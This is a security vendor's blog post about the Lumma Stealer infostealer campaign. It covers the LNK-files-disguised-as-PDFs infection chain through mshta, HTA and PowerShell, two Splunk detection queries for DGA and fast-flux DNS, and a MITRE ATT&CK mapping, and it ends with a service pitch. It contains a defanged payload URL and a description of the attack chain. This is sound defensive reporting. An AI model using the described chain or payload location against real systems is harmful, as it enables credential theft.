The rise of infostealer malware has fueled a wave of cybercrime, with businesses facing escalating risks from stolen credentials, unauthorised access, and data leaks. Threat actors are no longer just targeting large enterprises—organisations across industries are now in the crosshairs of sophisticated malware campaigns.
Among the most active threats today is Lumma Stealer, a Malware-as-a-Service (MaaS) strain that allows attackers to harvest login credentials, financial data, and system information at scale. This blog delves into how Lumma Stealer campaigns are executed, the techniques used to evade detection, and critical security measures to mitigate the risk of compromise.
The surge in Infostealer campaigns has particularly affected organisations in the EMEA region, with an increase of up to 58% according to Checkpoint. In 2024, these campaigns led to the infection of over 18 million devices, resulting in the exposure and sale of over 2.4 billion compromised credentials.
Lumma Stealer is a type of information-stealing malware offered through a Malware-as-a-Service (MaaS) platform. It targets Windows systems and is capable of stealing browser information, including credentials, cookies, autofill data, and browser extension data such as cryptocurrency wallets. Additionally, it collects .txt files from the user’s desktop and extracts data from programs like AnyDesk, FileZilla, KeePass, and Telegram. Written in C++, Lumma Stealer was first identified in September 2022. Threat actors have used logs from Lumma Stealer infections to gain initial access and deploy Cloak ransomware. Initial Access Brokers (IAB) then sell these credentials in underground marketplaces, fueling a range of cyberattacks such as ransomware and fraud.
The ongoing Lumma Stealer campaign uses malicious LNK (shortcut) files disguised as legitimate PDF documents. These LNK files initiate a multi-stage infection process, leading to the deployment of Lumma Stealer on the victim's machine. The campaign targets multiple industries, including:
Initial access is commonly achieved through drive-by compromises using malicious WebDAV servers while users unknowingly visit infected websites.
When the malicious LNK file, masked as a PDF, is executed, it downloads and runs further payloads.
“http://x.x.x.x/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”
The malicious file weaponises legitimate executables like mshta.exe to run HTML application files (HTA), which then execute PowerShell commands that connect back to the command and control (C2) server. The final PowerShell script downloads and executes the infostealer “Kompass-4.1.2.exe” (Lumma Stealer).
Infostealers often use Domain Generation Algorithms (DGAs) to facilitate communication with C2 servers. Detecting DGAs can be achieved by calculating the Shannon entropy of domain names to identify randomness. Here are two query examples for detecting DGA and DNS Fast Flux attacks:
Plain Text
Plain Text
Plain Text
| tstats c(query) as cc dc(query) as dcc values(query) as query where index="main" sourcetype="*dns*" query!="*in-addr*" query!="*.*.*.*" query!="*arpa*" query="*.*.*" query!="www*" query!="*.local" query!="*.main" query!="*.corp" query!="*.com" rcode_name=NXDOMAIN id.orig_h IN (10*,192.168*,172*) by id.orig_h _time span=8h | where dcc>=200 | eval query=mvfilter(match(query,"^([a-zA-Z0-9]+)\.([a-zA-Z0-9]+)\.([a-zA-Z0-9]+)$")) | where mvcount(query)>=1000 | fields - dcc cc
Plain Text
Plain Text
Plain Text
| tstats dc(answers{}) as num_ips where index="main" sourcetype="*dns*" answers{}=* AA=true rejected=false (qtype_name=AAAA OR qtype_name=NS) by query _time span=1h | where num_ips>=100 and !isnull(query)
| Tactic | Technique |
|---|---|
| Execution (TA0002) | T1059 – Command and Scripting Interpreter: PowerShell |
| T1204.002 – User Execution: Malicious File | |
| T1047 – Windows Management Instrumentation (WMI) | |
| Persistence (TA0003) | T1547.001 – Registry Run Keys / Startup Folder |
| Privilege Escalation (TA0004) | T1218.011 – System Binary Proxy Execution: Rundll32 |
| Defense Evasion (TA0005) | T1027 – Obfuscated Files or Information |
| T1036.003 – Masquerading: Rename System Utilities | |
| T1564.003 – Hide Artifacts: Hidden Window | |
| Credential Access (TA0006) | T1012 – Query Registry |
| Discovery (TA0007) | T1082 – System Information Discovery |
| Lateral Movement (TA0008) | T1021.002 – Remote Services: SMB/Windows Admin Shares |
| Collection (TA0009) | T1114 – Email Collection |
| T1560 – Archive Collected Data | |
| Command and Control (TA0011) | T1071 – Application Layer Protocol |
| Exfiltration (TA0010) | T1041 – Exfiltration Over C2 Channel |
| Impact (TA0040) | T1489 – Service Stop |
| T1490 – Inhibit System Recovery |
Malware strains like Lumma Stealer don’t just steal credentials—they act as gateways to larger cyber threats, including ransomware and network intrusions. Without proactive monitoring and advanced security controls, businesses risk financial losses, reputational damage, and regulatory consequences.
Organisations can help mitigate these risks by leveraging managed security services that provide continuous threat intelligence, incident response, and proactive vulnerability management. At CybaVerse, our Threat Detection & Response Services help businesses identify, analyse, and contain threats before they escalate.